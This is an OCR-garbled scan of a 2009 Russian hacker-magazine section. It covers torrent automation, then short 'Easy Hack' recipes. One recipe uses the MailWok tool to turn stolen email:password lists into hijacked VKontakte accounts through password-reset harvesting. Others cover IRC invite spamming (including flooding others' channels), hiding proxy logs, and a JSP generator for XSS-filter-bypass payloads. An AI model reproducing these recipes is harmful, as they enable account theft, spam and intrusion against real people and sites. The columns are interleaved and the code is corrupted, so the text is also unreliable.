ками с мобилы, получить аккаунты на приватных
трекерах и автоматически скачивать свежие
дистрибутивы программ. Вот эти м и зай~~емся I
ОБХОДИМСЯ БЕЗ КЛИЕНТА
Все чаще начинаю замечать. что некоторые
потрафикуу хостера. Дома ничто не мешает
воспользоваться любимым клиентом (напри­
мер, uTorгentl, но сам лично не раз стал кивался
с ситуацией, mгда файл кровь из носа нужно
было скачать из совершенно левого места. Как
вариант, на машине можноустановить порти­
нажать на кнопку «Download torrent" и далее вы­
брать папку для сохранения файла на локальном .
диске. В большинстве случаев, началозакачки
не заставит себя долго ждать. Секрет работы
сайта в специальном Jаvа-апплете, который и
выполняетфункции Тоггепt-кгиента Но отсюда

эксклюзивные вещи становится возможн ым руемый кгиент. которых большинство, но есть же возникает и единственноетребование. необ­

~ 034 ХАКЕ'Р 06 /126/ 09


:. .. . . изтор­
РЕНТОВ ПРЯМО ЧЕРЕЗ ЛЮБОЙ
ВРДУЗЕ::Р
г----------------------il 'l !
ходи~ю позаботиться,чтобыдnятвоего браузера
) бып установпен плагин Java VM.
РЕГИСТРИРУЕМСЯНА
ЗАКРЫТЫХТРЕКЕРАХ
Ни для кого не секрет, что дnя регистрации на
закрытых торрент-трекерах нужны инваЙты.
Взять хотя бы легендарный Demonoid Только
где эти инвайты взять, еслv.друзья о таких
сервисахдажене СllышаllИ На самом деllе,
попностью приватны
треJсерыы- большая
редкость. Многие изтаких вот закрытых
трекеров открывают свободную регистрацию в
опредеllенные дни недеllИ v.ли даже оnреде­
пенные часы. Уследить за этим довольно
тяжело, муторно - в КОl1це концов, не наш этот
метод вручную заходить на сайт 8 надежде,
что вот-воттам откроется регистрация. Не
буду говорить по поводу того, ЧТО можно на­
писать простенький скрипт. КОТОрЫЙ сам все
автоматически будет проверять Но нескажу
лишь потому, что уже давно сделали за нас
создатели сервисов Trackerchecker.org и
\Nvvw.o[Jentrackers.lr. Первый очень простой:
скорее всего, какой-то rv.K ero сделаll для себя,
а после OTKpbIll для всех желающих. Совсе"
другое дело - opentrackers. Тутты не только
можешь узнать о состоянии регистрации
нужныхтебетрекеров[а заодно и открытьдля
себя кучу новых], но и посмотретьконкретную
статистv.купо каждомуv.з них, А чтобы не про­
пустить «счастлv.выечасы", тебе предлагается
подписаться на общий для всехтрекеров
RSS-фид,либо на фид по KOHKpeTHO'~yресурсу
Если присмотреться,то рядом с наиболее по­
пулярнымитрекерами есть небольшая иконка
[например,у Demonoid'a v.IlИ f'ileList orq), по
которой можно перейти на сайты для обмена
приглаUJеНИ>lМИ Обычно эти IlИНКИ ведут на
ветки каких-то форумов, поэтому для запроса
приглашения придется предварительноза-
Несколькополезных
сервисов
• Сколько раз, скачав довольно большой файл, ты обнаруживал, что этот вовсе не во­
жделенная программа, а какой-то непонятный фейк? Врядли многим приходит в голову
просто нагадить, а вот поднять рейтинг за счет якобы ценного файла горазды многие.
Огородить себя от подделок просто: достаточно предварительно проверить подлинность
файла, скормив его хэш (а он обязательно прописан в .tопепt) специальному сервису ­
\\'\ \'\~JSlI1·_ellrsp.1 т. (0111 .
• Инструментовдля удобного поиска по торрентам рунета не так много. Зато есть за­
мечательный сервис Baratro (I):I!" 11', '. ПJ), которыйИНдексируетторрент-файлы
друтихтрекеров,в том числе и закрытых,и предоставляетвозможностьбыстроискать
нужные файлы, забыв о проблемахрейтинга.
ХАКЕР 06/126/09
'О.'О ... @/(;->==­
~,iltl .I~
-. =--­
._0 ~
--­
,..
." -::;.
-
ю,.
"" "",~
~;...,:..-­
1:'::
1-­
;­
регистрироваться Кстати говоря, дпя обмена
инвайтами есть даже специаllизированный
ресурс - wwvueroRaid.com.
РАБОТАЕМ БЕЗ ТРЕКЕРА
Увы. но трекерызачастую оказываются недо­
ступными. Крупных и извеСТНЫХТр9.сутправо­
обладатели, неБОЛЬUJие и при ватные банально
оказываются недоступ ными из-за проблем с
хостингом. Сам протокол BitTorrent подразумевает
обязатеllьноеучастиетрекера, но клиенты разви­
ваются настолько быстро, чmуже сами придумали
дополнения для протокола. Так что Кilиенты могут
работать вообще без трекера. Если в опциях
программы естьуказание на DНТ -считай, так
оно и есть. DНТ [DistribuLed Hash ТаЫе. распре­
деленная хэш-табllицаJ работаетдnя разных
р2р-технологий, но конкретно Кilиентам 8itТоггепt
позволяет обойтись вообще без трекера. Ины"и
словами, Кilиент сможет найти nИРОВ,даже если
трекер отключен или даже никогда не существо­
аал. Кроме топа, l'Oрренты можно размещать без
трекера. Утакого развития Кilиентов есть и ложка
дегтя. в виду отсутствия стандарта нет единого
понятия 01"ОМ, какдолжна выглядеть таблица
DНТ В результате, в нашем любимом ~Тогneпl ис­
пользуется та же реализацv.я DНТ. что и в МаiП\lпе
и BIIComet, но, увы, несовмесгимая с Azureus. В
любом случае, поддержкуDНТ в своем Кilиенте
необходи~ю ВКilючить в обюательном порядке.
УДАЛЕН НО УПРАВЛЯ'Е~М
ЗАКАЧКАМИ ЧЕРЕЗ ВЕБ
со многих
-:'..
...
-:='";;;;;;;';­
,"'.~
••
ВАИТ НА ЗАКРЫТЫЕ TPEKEPbl
ТВОЙ ИН­
Имея не очень широкий канал, мне удобнее
закачиватьфайлы в момент моего отсутствия
дома Поэтому зачастую управпять закачка­
ми приходитсяудаllенно. Конечно, ничто не
ограничивает в ИСПОllьзовании обычного
R РD-клиента, но 1уТ ты опять оказыва ешься
привязанным к компьютеру. К счастью, есть
способ вообще избавиться от каких-либо
ограничений, установив для своего клиента
веб-интерфейс Одним из самых распростра­
ненных вариантов является связка нашего лю­
бимого uTorrent и специально разработанного
веб-интерфейсаWebUI [htl[J//lогum.Ulоггепt.
com/vie\'IIforum.ph[J?id=20J. ДIlЯ установки надо
лишь распаковать архив с ПОСllедней версией
WebUI прямо в папку u Тоггепt'а и далее ВКIlЮ­
чить ero в настройках. После того, какактиви­
руешь веб-клиент соответствующей галочкой,
тебе предложат ввести логин v. парольдля
ДОС1упа, сделать гостевую учетку, а также за­
дать порт, на котором клиент будет принимать
подключения Вот, собственно, и все: теперь,
чтобы обратиться к веб-интерфейсу, доста­
точно набрать в адресной строке httр//<твой
'р>.<указанныЙ в настройках порт>/gUI/
Неважно, откуда ты будеwь попьзовать веб­
v.нтерфеЙсо", неважно какой браузер будет
использоваться - управлять закачками ты
можешь хоть через мобv.льныl~ браузер теле­
фона [npoBepeHo на Opera Мiпil Не эабудь
пробросИ1"Ь порты, если используешь маршру­
тизатор и разрешить входящие подключения
для нужного порта в фаЙрволе. Для большего
удобства реко,~ендую обзавестись записью
в каком-нибудь DупDNS-сервисе (например,
dуПdпs.соm], чтобы вместо своего IP вводить
что-то mоilоггепt.d пdПS.соm.
Должен признать, что последняя версия WebUI
вышла еще в 2008 году и содержит HecKollbKO
неприятных ограничений Впрочем, такой
проектбез развитv.я долго оставаться не мог.
Сейчас активно продвигается модификация
WebUl WIP, версия для удобного просмотра с
мобильных устройств u Тоггепt МiпiUI, а также
ряд других проектов. ссылки на которые ты
найдешь в сноске.
JABBER И BITTORRENT
Конечно. веб-интерфейс - зто вовсе не
уникальная фишка uTorrent. Если говорить о
популярном никсовам И маковском Кilиенте
I~ 035
 г::=~::::-;;~~-~ 00" ~ ".'''~'.-.----------= L~L"--~ll

~~...
5:..\3.
$'StfII.
СЭIOOJl
;:::
~-~-.~~~:-~~-.~~~.;,,..,s.

.
•
•
~
~
~
~.:: ~~~ ;:-~)~ ::~
l.~JGI)
~т.!CZ;
::6..~~~1S
~A'"

m.~,.

:O:n~.,.

= .. !'!А --~;;,;-___;:;:..-­

))(~~ :-6~;
'

5-.. . Sor~ s.,;Of,W "-'О.G'to

~ warning
Несиотрянадурную

. '
славу,
-
BitTorrent
это лl-tшь распре­

деле), ная сеть для

обмена Файламl-t_
URЕМОТЕПОЗВОЛЯЕТУ~АЛЕННQУПРАВ­
Но надо ПОНИ'1аТЬ,
ПЯТЬ • •
что, l-tспользуя его
• •• •
для загрузки вареза

или пиратской вер­

•
сии фильма,
ЧТОБЫ НЕ КАЧАТЬ ВСЕ ФАЙЛЫ ИЗ RSS­ подписку В общем-то, большую часть работы в этон случае
ты нарушаешь закон.
ФИДА, НАДО НАСТРОИТЬФИЛЫРЫ выполня ют сами ресурсы, которые генерируют контент для этих

Автор и реда кцl-tя самых фидов Особенно часто 8стречаются RSS-фиды с еже­
зто НИ В KOef1 случае недельнымl-tтелевизионными программами l-tли сериалами,

не поощряют. Тгапsmlssiоп (httр:!IWVffl.tгапsmissiопЫ.соrn].ТОдЛянего закачкукоторых как раз и хочется автоматизи ровать. Лезть на
разработа н не менее впечатляющий веб-l-tнтерфейс CILJtch сайт за каждой новой серией тупо леl-1Ь, Зато подпl-tсаться на
(httr !/cod e,I'ecLJrsel'.com!wiki/clLJtchiAboLJt!. Семимильн ы ми нужный RSS-фl-tд через торрент-клиентне сложнее, чем просто

€)

~ dvd
ша га м l-t развивается кросс-платформенная ПРОГРЫ1ма
Ideluge-tоггепt.огgJ, у которой также есть подобная опция. Тут
надо отдать должное разработчикам, создавшим открытую
систему - и без того широкl-tе возможности клl-tента можно

как угодно расширитьза счетплагинов, также, каки ca,~a

Deluge добавить новую закачку. Соответствующий пункт меню есть
практически во всехсоsременныхторрент-клиентах.

Возникают вопросы, когда для доступа к подписке требу­

ется НТТР-аутентификация, Если использовать
то формат URLдля подпl-tски должен вы глядеть так:
uTorrent,
Ilttg:/i
На диске ты найдешь программа, написанных на Python На официальном сайте логин :парольraнекий-тоggент-саЙт.соm/гss.рhр,ИЛl-t
все упомянутые естьоднолюбопытное дополненl-tе RemoteNotify. которое друrой вариант - снарядить клl-tент нужной cookie k U ID и
в программе утилиты, отправляет сообщен ия оэавершенн ыхзагрузках на любой паролем на нужный TpeKepl8oTTaK:
а также дополнения Jabber ID Однако на,1НОГО интереснее другая ее возможность httр:l/некиЙ-торрент-саЙт.соm/гss,рh р С О О КI E:ui d-O 1'gas
к Hl-tМ. - управленl-tе Тоггепt'аМl-t с помощью простых команд череэ s~(jwertysdf354scdfg2
JаЬЬег-сообщения. Можно отправить своему кл иентусообще­ Если говоритьо uТоггепt, то грех не воспользоваться встро­
ние вроде «add hltр:/illПklllпk» - l-t DеlLJgедобавит новую ен ной системой фильтроs, которая настраl-tвается через RSS
закачку.IМ-КЛl-tентееть практически у каждого нателефоне, Downloader [вызывается горячей кнопкой Ctrl-RI Для каждого
и почти все они, помl-tмо пресловутой aCbKl-t, начl-tнают под­ фl-tльтра можно указать словосочетан ие, которое должно
держивать множество других протоколов и, конечноже, Jabber sстречаться или, наПРОТИ8, не 8стречаться, причем допуска­

ются служебные сим волы' и *, приоритет AJlЯ Н08ЫХ закачек

ПОДПИСКА НА ТОРРЕНТЫ ПО
Самый классный способ автоиаТЮl-tроватьэакачку некоторых
файлов - подгружать ссылки на tоггепt-фа йлы через
НАСТРАИВАЕМ ШЕЙПЕР: ТЕПЕРЬ ПОЛНАЯ ШИРИНА КАНАЛА
RSS и папку для загрузок. Важно, что тут не l-1аАо указывать номер
серии илl-t сезона lопятьжеупор на эакачкуименно cePl-tалов),
RSS­ Т;С это нарушит работу фильтра. Для указан ия этих параметров
ес,ь отдельное поле с конкретным шаблоном, рядом же можно
указать и требуемое качество IDVDRIP, Н DТV итд,!.
И все-таки. получается довольно-таки огранl-tченная

1
БУДЕтдоеТУПНАUТОRRЕNТТОЛЬКОГЛУБОКОЙНОЧЬЮ автоматизация: мы напрямую зависим отех, кто соэдает

RSS-фl-tды. Что делать, еСЛl-t подписки для интересующего

. . G.......1 • нас контента банально нет' Вот тут-то нам и поможет уже

jг­
r- UI settings знакомый инструментУаhоо Pipes [pipes,yar,oo.cQm], Этот
!-·DitectQries
o Еn.ы. S<:h.dul.,. замечательный сервис позволяет обрабатывать раэличные
, 1·- Connection
Schedulerl'O!IbIe
I 1·- Вand",dth источнl-tкl-t данных [RSS-фиды, любые HTML-страl-JичкиJ,
~ 8itTorтent"
фильтровать полученный контент, выделять из него нужные
!." QUfue:ing I
~Scneduler I данные и получившийся поток информациl-t оформить 8
;-.. \~,reb ur I виде обычного RSS-фида. А поскольку настройка «водо­
I (~- Adv.nced I провода» выполняется с помощью графl-tческого l-tнтер­
фейса, то можно очень быстро сварганить готовую подписку
I DTumoff
с совершенно любой l-tнформацией, в том чl-tсле И ссылка'1И
на интересующие тебя торренты. То, откуда ты l-tХ будешь
[;JLimit~ О Seeding only
брать и по KaKO~~y Прl-tнципу отбирать, зависиттолько от
S<hedul ... S<ttings тебя. Ч-roбы быстрее BHl-tКНУТЬ в водопроводные дела, реко­
limited uplcad r~te (kВIs): o OisO!lbIe ОНТ whEn tuming off мендую тебе статью "Интернет на ОДНОЙ странице» из 11 О
limit~d dO·....ТlloO!ld r~te (kB/-s): номера I (РDF-версия будет на нашем дискеl.

I------------~~---­ АВТОМАТИЗИРУЕМ ЗАКАЧКИ

Есть еще несколько способов автоматизировать за­
качки. В том числе и на удаленной иаШl-tне, Напрl-tмер,

~ 0з6 ХАКЕР 06 /126/ 09

 .} Q(@)@J
!orrent ~dit yie\y .!ielp

v
.­
';:::::
1
,
I~~--._--.J
C{F 00 G&
Add Start Pause Remove Pгopeгties

~
'~
Active QOYJnloading S,eeding faused
~~,-~~,
:O't!'.ti'
tO....."""" ~,~.b'I'

D kuЬuпtU-9.04-dеsktор-аmdб4.isо
694,7 МВ, uploaded 3103 кв (Ratio: 0,00)

Seedinq 10 1 ОГ 1 со,щеСlеd реег· ир; 0.0 KB/.

LJ Question Copyright - Sita S;ngs the Blues •

616,7 I~B 01 1,4 GB (44,10%)·1 hour ren,.ining
480р SD

DO\l'mloading froгn 3 of 4 connected peer;· Dоvщ: 218.2 K8{s

~R·~·~~РУБАдЛяГРАББИНГАЛИНКОВНА
СВЕЖИЕ СЕРИИ ПОПУЛЯРНОГО СЕРИАЛА 1,· . ,

очень удобно на хоете с широким канаnом и работаю­

щими tоггепt-клиентом расшарить папку И сделать так,
з Toггents ~ Ratio: 0.04 .. 1.72 MB/s .. 180.9 KB/s
чтобы прога автоматически подхватываnа 8се ПОЯ8ЛЯЮ­
щиеся там ,tоггепt-файлы Помнится, в С80е время Я TRANSMISSION ДЛЯ МАКА И ТУКСД
даже ПViсаn простенький Регl-скипт. который запускаnся

каждые пять минут через пnанировщик I~ проверяn пап­

ку на обновление, скармливая появившиеся торренты на мапо, В России трафик чаще режут на уровне организации,
скачку кnиенту Доступ к зтой папке был у моих друзей, и чтобы сотрудников не сипьно баловать халявным инетом,
они очень просто могли 80СnОnЬЗ0ваться моим каналом, Обойти такие ограничения не просто. но можно, Достаточно

просто скопировав в эту папку нужные торренты, а потом очевидный способ - сделать так, чтобы провайдеры не
спить закачанные файлы по специально открытому для могли разобрать, какие данные и каким образом переда­
них ПР, ются пользователем, Трафикдля этого можно пустить через

Чуть позже ПОЯ8ИЛСЯ дедик на винде и оказаnось, что шифрованный туннель, но это зачастую дорого [например,
автоматизировать это можно прямо средствами uТоггепt, в сnучае nnaTHoro VРN-сервиса) иnи медленно [в случае • о том, как само­
Надо лишь в разделе "Другие настройки» включить опцию беспnатного варианта на базе Toro же Тог'аl Однако в ~~y поднять С80Й

«Автозагрузка файnов .tоггепt» и задать папку для загрузки нашем сnучае необяза-rеnьно решать пробnем «в лоб», торрент-трекер, ты

Правда, по умолчанию клиент наЗОЙnИ80 будеттреб08ать Возможность шифрования трафика на основе простого ~~ожешь прочитать

путь для сохранения закаЧи8аемых фаЙЛ08, но и зто можно апгорип~а RC4 появилась в самих кnиентах Шифрование 8 #114у POF-куСО

побороть, указав нужную папку 8 попе "Помещать загружае­ протокопа IPгotocol EncryptlOn], впервые реапизованное статьей мы выложили

мыефайлы в», Чтобы не спутать старые файnы с новыми, все в проге BltComet еще в 2аО5 году, теперь поддерживается на диске,

обработан н ые торренты uТоггеп! помечает расши рен ием г,рапически всеми клиентами и включается без лишнего
,torrent,Loaded, геморроя устаН08КОЙ нужной галочки в настройках, Если • Раз уж мы за 1'080­
взять UTorrent, то шифр08ать трафик он умеет 8 нескольких рипи о веб-оболочках

ОБХОДИМ ЗАЩИТУ ПРОВОВ режимах. для всех подключений, только для входящих, для упра8ления

Колоссальны й объем трафика, про качивае~шй через тоnько для исходя щих И Тд, закачками, не могу

BitTorrent, конечно, не СИЛЬНО нравится провайдерам, Реально обойти и другие ограничения, Если корпора­ не упом~нуть раз­

В н екоторых странах п ровы охотно начина ют бороться с тивный файрвоn режет трафик по конкретны м портам, работку TorrentFLux
р2р-сетями и ограничиваютсоединения, ссылаясь на то, то в кnиенте можно попробовать установить другой порт. [torrentflux,com]
что через торрент [8нимание l ] может передавать варез, В конце концов, тот же uTorrent отлично работает через Это торрент-клиент,

Отмазка, конечно, неплохая, но ПОЛЬЗ08ателейутешает прокси или саксУ который поnноетью

написан на РНР
и довольно просто

уста на вл ива ется на

LАМРхоетингпод
никсами

• Привыкнув
К uTorrent'y, сложно
перейти на альтерна­
тивные кnиенты под

другими ОС Приятно,
ДМ это й програ~~­

мы уже сейчас есть

бета-версия под Мас
05, а под туксом она
отлично работает под

эмулятором Wine,

ХАКЕР 06 /126/ 09 ~ 037

» в=:лом

Easy Easy
Hack Hack

ХАКЕРСКIИЕ

Eas
Hack

ЛЕОНИД "ROID" СТРОЙ кОВ АНДРЕЙ "SKVOZ" КОМАРОВ MORO

СЕКРЕТЫ
ПРОСТЫХ
ВЕЩЕЙ

I RDIDraHAIL,RU I I KOHAROVra ITDEFENCE.RU I I HOROraINBOX.R.U I

ЗАДАЧА: ПРОЧЕКдТЬ СПИСОК §'@БМIН"ММ

МЫЛЬНИКОВ НА НАЛИЧИЕ АККд­
УНТОВ «ВКОНТАКТЕ»
f~~:'- _1~_~_:_J~_~ Ц_ш._-_-~ _~ _-oi-'~
РЕШЕНИЕ:
Социальные сети с каждым днем набирают все большую популярность. I
Поэтому я даже не буду сп рашивать, зачем тебе могут потр ебо вать акки, Сбор паролей от «ВКонтакте»

на пример, от \N'N'N.vkonta I\te.ru:) Собрать пару сотен подобных уч етн ых за­

пиceй зачастую просто необходимо, но как быть, если на руках имеется лишь 2. В~6ираем список вида мыло: паропь, где паропь - пасс от м:ыль­

внушительный маил-лист вида МЫЛО.пароль, который необходимо преоб­ ника

разить в список ТИ па логи н :пароль ОТ "ВКонтакте» 1 Ре шение есть, и сейчас з. ':IeKael'1 мыльники на валид

ятебе его представлю. Для осуществелния задуманного мы воспользуемс~ 4. Валидные МЫПЬНИКИ чекаем на наличие акков <'<ВКОНТакте)о)

утилой MailWok, которая предназначена для проверки мыл на наличие акков 5. Ждем HeCKOJJbKQ l"4И.Н)"Т (пока на мыла рассыпаются письна С JЭос­

"в Конта кте», а та кже для автоматического восста новления па рол ей и их СТдновлеННЫJoВ1 пассаии от социальной сети)

сбора с прочеканных ящиков. Прежде чем перейти к активным действиям, б. Теперь жнем на баТТQВ <~Проверить мыла» и Бдем, пока тулза

рассмотрим возможности софтинки: соберет с ЯЩИКО8 письма I пришедшие ОТ «ВКонтакте»

7. Сохраняем полученные акки

• 'Чекинг мьш на наличие аККОБ «ЕКонтакте»

• Автоматический запрос на восстановления пароля от аККдунr:rа Теперь о возможных проблемах l Если пасс от "ВКоптакте» не пришел, зпачит:
«ВКонтакте»

• Автоматический сбор писем с паролян:и от «ВКонтакте» с проче~ 1. Мыло не лрочекано на валид либо невацидаое

канных ИЫЛЬНИКОВ 2 •.~·jылО не эарегано «БКонтакте»

• Автсиатическое удаление собранных. пиоем с носетановпением з. AKKaYf':T «Вl(oH'I'aKTe» зареГYiстрирован, но не активироsан

пароля

• Поддержка ПОП'.fлярных почтовых сервисов {mail.ru, rambler .П], Как видишь, все довольно просто, но зффективно При наличии времени,
уапdех.ru, есс) желания и большой базы мыльных акков ты запросто сможешь собрать
целую 5Д с учетками от w\I'iw.vkontakte.ru. Однако не забывай, что за все свои
Если ты до сих пор не понял, о чем речь, то имеетсмысл ознакомиться с под­ действ и я ты отвечаешь сам, а испол ьзо ван ие '1ужих аккаунто В кате гор ич ески

робным алгоритмом действий по решению поставленной задачи: запрещено.

P.S, На нашем ДВД ты найдешь нетолько утилу MallWok, по и сорцы, которые

1. Слушаем уТ'илу с нашеrо двд были любезно предоставлены автором продукта

ЗАДАЧА: НАБРАТЬ БОЛЬШОЕ ко­ Обрати 8нимание.

Л ИЧ ЕСТВО ЛЮДЕЙ НА I RC-КдНАЛЕ
При превышении лm-штов инвайтов следуе1' переподключиться

РЕШЕНИЕ: Не Стоит собирать ники со служебных каналов (иначе минуты

Если ть! фанат iRC, то раскрученныL:\ капал С обилием народа, ДЛR тебя­ жизни TBOe'I'O канала сочтены}

дело '1ести. Воттолько собраl'Ь внушительное количество людей не так-то При желании дропнуть чужой канал - достаточно rrpо:инвайтить

просто Можно, конечно, рекламировать свой IRС-канал всеми возможными ники со служебlШХ каналов :)
способами, однако есть гораздо более эффективный метод, о котором я
тебе сейчас расскажу. Суть его заключается в автоматической рассылке Пла вно перейдем к установкескрипта:
ин вайтов и попол не нии численности ка наЛОflдселен ия за счет в ключен­

ного автоджойна при получении инваЙта. Ка к ты понимаешь, речь идет об 1. Сливаем скрипт с нашеrо ДВД

автоматизированной доставке приглашений, поэтому знакомься -«Invlte 2. О'гкрываен mirс-редснстор СКрИПТОВ (aka
т;гс script Ьу elimS". Именно он поможет нам осуществить задуманное. Итак, <Alt +R»
начнем с описания функциональности скрипта. ! _ _.__ _...•:=::J з. СОЗДд.ем новый Сl\РИПТ Iс содеРЖИМbh"j

нужного нам скрипта "Iпv~tе mirc scripc Ьу

• Автоматический сбор ников elimS" )
• Автоматическая рассылка инвайтое
Скрипт автоинвайтов

----------------------------------------~----------+­

ХАКЕР 06 /126/ 09
 » В::ЛОМ

Далее необходимо сконфигурировать скрипт Для этого: которого следует собирать ники (н" '!'вое усмотрение)

4) На кого будет действовать СКрИilТ - отмечаем тех, кого СОGИ­

1. Выбираем наш СlФИ"'" раемся инвайтить (ОПОВ не брать,))

2. В параметрах Уl(аэывае,,: 5) Инвайт ИЗ Уl<азан:tiого ник-листа - ИСПОПЬЗОВд:lие твоего собс­

1) Канал - канал, на который будем приrлашать TBer.Horo н",к-писта для р"ссыпки инвайтов

2) Частота инвайта - цифра в милисекундах (1 секунда = 11( мили­ 6) НИК-ЛИС'Т' :ИСJ<лючений ­ перечисляем НИКИ, KO'l'OPbl€ не будем

секунд) . Не .забудь, '{то на каждом сервере существует свой лимит лриглаШд:ТЬ на канал

инвайтов по врем€:nи, поэтому не жадничай и :{казывай не менее 2

секунд. СЛО80М. если ИРЦ ­ неотъемпемаR часть твоей виртуальной жизни, смело

З) Величина канала - :минимальное количеС'Т'ВD людей на канале t С СЛИ8ай СКР'1Птс нашего диска.1 приступай К раскрутке собственного канала.

Lide
ЗАДАЧА: УСТАНОВИТЬ И НАСТРО­ Web Obrazky Video JCQ.c:om

иты
аснАтT

РЕШЕНИЕ: Номе
•.• m"lт1 p1iT' _ _. . . . .
3 одном из прошлых выпусков:У.: мы выкладывали на нашем диске
замечательную софтину ICQChal Но подробный мануал по настройке
тулзы ОТСУТСТ80вал. что вызвало немало вопросов. ЧТО Ж, пришло время

[aJ
Chat Rooms
"справить досадное недоразумение и расста8ИТЬ все по СВОИМ местам

;';перЕа сформулируем план наших действий'

1. Смена паропя от аднинки бота Bгoken HeOt1s GI'OUP

Been in b~d relationship1
Смена дефоптного порта "ДМИНКИ
O!II
2. &eon che&ed .snd/or lied to
Ьу
3. Включить/Отключитьадминку

lоехали J
Для того чтобы сме нить адм инский аккаунт, нам необходимо: Юзаем ICQChat

Зайти в папку с ботом

Найти файл j irnbot . хт1 • В"ЛЮ'-Jение - true, отключение ­ fa1se

Отредак'Т·ировать строчн:у с ЛОГИНОМ: <ent.ry key:::: "http.
user" >admi.t1< /entry> Пора перейти к настройкам чата. Рекомендуюобратить внимание на
• О''Гредактировать стро'!ку с паропе", <епcrу \ey="http. следующие параметры:

раSS">аdmiп</епtrу>

число переподключенийдвижка при обрыве: 5

1. Теперь сменим дефолтовый порт админки. Для этого: Пауза ДЛЯ входящих сообщений: 1000
Пауза ДЛЯ ИСХОДЯЩИХ сообщений: 500
Заходим в паПJ.<У с ботом Ограничение очереди исходящих, 2О
Ище!<1 файл jhttpserver.proper:ies Пауза перед "ереэапуском коннекта: 660000
Редактv.руем строку с указанием порта: port=8888 Чиспо повторов Фпуда: 5
Сохраняем изменения Период фпуда (сек): 10
Пауза сообщений ДЛЯ незареганых (сек) : 20
~. Если ты реш ил отключить адм и н ку. тебе следует: ЗадерЕка очереди чата: 10000
И многие другие ,)
Зайти Б папку С ботом

Найти ф"й.~ j iшЬоt. хт1 Вот и все. Надеюсь. проблем с дал ьне й шей эксплуатациейчата утебя н е
Отредактировать строку, kеу=»mаiп, StartHTTP»>tJ;ue< возникнет

ЗАДАЧА: УСТАНОВИТЬиl сконфи­

ГУРИРОВАТЬ ЗРRОХУС ПОДДЕР­
жкой SOCiKS5

РЕШЕНИЕ:
Саксы нужны всегда и 8езде:l­
ОДН им ИЗ лучш их соке-серверов по пра8У считается Зргоху
ПОЭТОI~У сейчас мы
подробно рассмотрим его установку из портов на
базе ФрRХИ Устанавливаем 3ргоху

ii cd !USJ;!poJ;ts!netl3proxy/

# make instal1 с1еап

09 ХАКЕР 06 /126/ 09 ~ 039

» Е:~ЛОМ '---+--------------------1'----------.-.-----------------;---­
Easy Еаsч
Hack Hack

Теперьсоздаем конфиг: Далее откры вай м но гострадал ьны й конфиг Эр roxy.cfg и редакти руй по-своему
усмотрению [прv.мер правильного конфига ищи на DVO).
# ер /usr /10саl/еtс!Зрrоху,cfg _samp1e /usr /lоса1/еtс!Зрrоху.cfg Все, установка закончена Запусхаем Зргоху на сервере в качестве дe~~OHa:

При необходимоcrи - пишем логи в созданную диру: ff /usr 1l0calletc/rc. d/3proxy start

# mk:dir /var 110gI3proxy Хттп-прокси И сокс-проксикК твоим услугам - пользуйся и не забывай про
лог и -1.
Вообще, peKOMeHдyeTC~ пускать вселоги по прямому назначению - в/dеv/пull J

ЗАДАЧА: 060ЙТИСАМОnИСНУЮ -</head>

СИСТЕМУ ПО ЗАЩИТЕ ОТ XSS, УСТА­ <body>
НОВЛЕ:ННУЮ ЗЛОБНЫМ АДМИНОМ
ror(1ong i=O; i< Ох100; '+~)
РЕШЕНИЕ:
Тебе предстоит найти вариант, который заэедомо не предусмотрел long 1с = ОХ3С;

администратор. Обычно все админы руководствуются общедоступным .long gt = Ох3Е;

списком наиболее популярных сценариев с сайта ha.ckel·s.org/xss html long order =i « 8;
[Cross Site Sсгiрtlпg Cheat Sheet] или используют какой-либо модуль longLT=order 11t;
безопасности. Отчаиваться не стоит - лучше попробовать заюзать так l/оt1t.рrlпt1п(Lопg.tонехStrшgIL"l'} ": ");
называемые «fогеigп charsets». Примерныедействияследующие: lопg GT = order I gt;
1. Смотри следующий НТМ L-код, который позволит сгенерировать 256 //ОUL_рriпс1п(Lопg.tоНехStriпg[GТ)+ "<BR>");
вариаций для организации преодоления фильтра: String theScript = {сhаr)JЛ + "script" + (char)GT + "a1ert("
+ i + ");" -+ (char)LT + "/script" t {char-JGT;
<%@ page language=" ja',a" сопtепtТуре="teXt/html; Оис ,print 1п ( theScript + "<br>");
сhаrsеt=ПТF-8"

раgеЕпсоdiпg~"ПТF-8"%>

<%@page iшроrt=" org . apache. сошmопs. lal1g. StriлgЕsсареUt.ils'1 %> %>

<JDOCTYPE htm1 PUBLIC "-//I!I3C//DTD HTML 4.01 Transitionall/EN" </body>
''http://W'I'''' .,.3. orgnR/htro141l00se. dtd" > </ht:m1>
<htш1>

<head> 2. Попробуй распечатать результаты исполнения скрипта. Возможно,

<rneta http-equi.. . j= "Сопtеnt-Т"ур€ content= ,. text/htrnl;
11 ты увидишь, что не все l1З символов будут корректно отображаться как
charset=UTF-8"> на бумаге, тгк и в браузере. Причина - использование специфических
<title>XSS-генератор</tit1е> кодировок.

ЗАДАЧА: ВЕСТИ УЧЕТ РАБОТЫ TARGETS - храни~' информацию о конкретной исследуемой машине (IР

NMAP НА ШИРОКОМАСШТАБНЫХ address, hostname и ОС)

СЕТЯХ SC.'\,NNERS - содержит информацию о хосте, С KOToporo стартовал

~тna.psq1. На случай, если у тебя нес!солько распределенных скане­

РЕШЕНИЕ: ров с ПОДКЛЮ'"-iениен к базе

Существуетспециальныйпэтч, назы
аемыыйпmарsqL(SЩlгсеfогgе.пеt/рГОjесts/ RUNLIST - содержит Hser 10, да'IY 11 время ВЫЗОВд. Nmap. Соответс­

nmapsCJl]. Он добавляет подцержку работы с МуSQLдля хранения результатов твеН:НО 1 информация о поль~ователе читается из lеtс/раssт",1d.

сканирования. Это позволяет осуществлять удобный анализданных, ВЫПQЛ­ PORTSTAT - таблица с результатами сканирования и информацией О

нятьсортировкv. и выборки и3той кучилогов, которые могли бы хргниться как каждом порте (open/c1ose/fi1tered)
обычные текстовые файлы на выходе. Патч заточен на использование под Uп\х1 HOSTSST.'\T ­ всевозможного рода статистическая информация, вро­

Liпuх-окружением, позтомуотнесись внимательно к его настройке де общеrо количества просканированных ХОСТОВ/ портов и Т.Д.

1. Установи патч и открой файл -/пmарsql.гсдля редактирования. В зтом

файле хранятся все необходимые опции, главные из которых - настрой­ пример выборки из базы:
ки для подключения к базе
iiIYsq1> se1ect t:arget_ip, д, t, port, protocu1,
server'=localhost, db=nmaplog, 1.1ser=nтnap, -> state, runid frOГll portstat
passwd=sca~amanga

-> order Ьу target_ip, d, t ;

1. Запусти rJmap следующим образом'
+ + + + _
Т
пmар -А --mysql --runid 100 192.168.10_1124 +--------+-------+

3. В результате, в базе создадутся четыре таблицы:

targecip I d I ротс I руососо1
,"",е '~
~ 040 ХАКЕР 06 /126/ 091
 SOURCEFORCE.N[T"
